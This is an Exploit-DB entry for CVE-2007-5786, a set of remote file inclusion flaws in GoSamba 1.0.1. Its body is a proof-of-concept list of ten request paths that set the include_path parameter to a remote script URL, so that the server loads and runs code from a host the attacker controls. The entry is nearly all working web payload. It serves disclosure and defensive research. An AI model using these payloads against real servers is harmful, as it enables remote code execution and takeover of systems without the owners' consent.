GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusions

EDB-ID:

4575

CVE:

2007-5786

EDB Verified:

Author:

GoLd_M

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-10-27

Vulnerable App:

#################################################################################
#  GoSamba 1.0.1 (include_path) Multiple Remote File Inclusion Vulnerabilities
#  http://mesh.dl.sourceforge.net/sourceforge/gosamba/gosamba.1.0.1.tar.gz
#  POC :
#  /inc_group.php?include_path=http://localhost/scripts/020.txt?
#  /inc_manager.php?include_path=http://localhost/scripts/020.txt?
#  /inc_newgroup.php.php?include_path=http://localhost/scripts/020.txt?
#  /inc_smb_conf.php?include_path=http://localhost/scripts/020.txt?
#  /inc_user.php?include_path=http://localhost/scripts/020.txt?
#  /main.php?include_path=http://localhost/scripts/020.txt?
#  /include/HTML_oben.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe1.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe3.php?include_path=http://localhost/scripts/020.txt?
#################################################################################

# milw0rm.com [2007-10-27]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services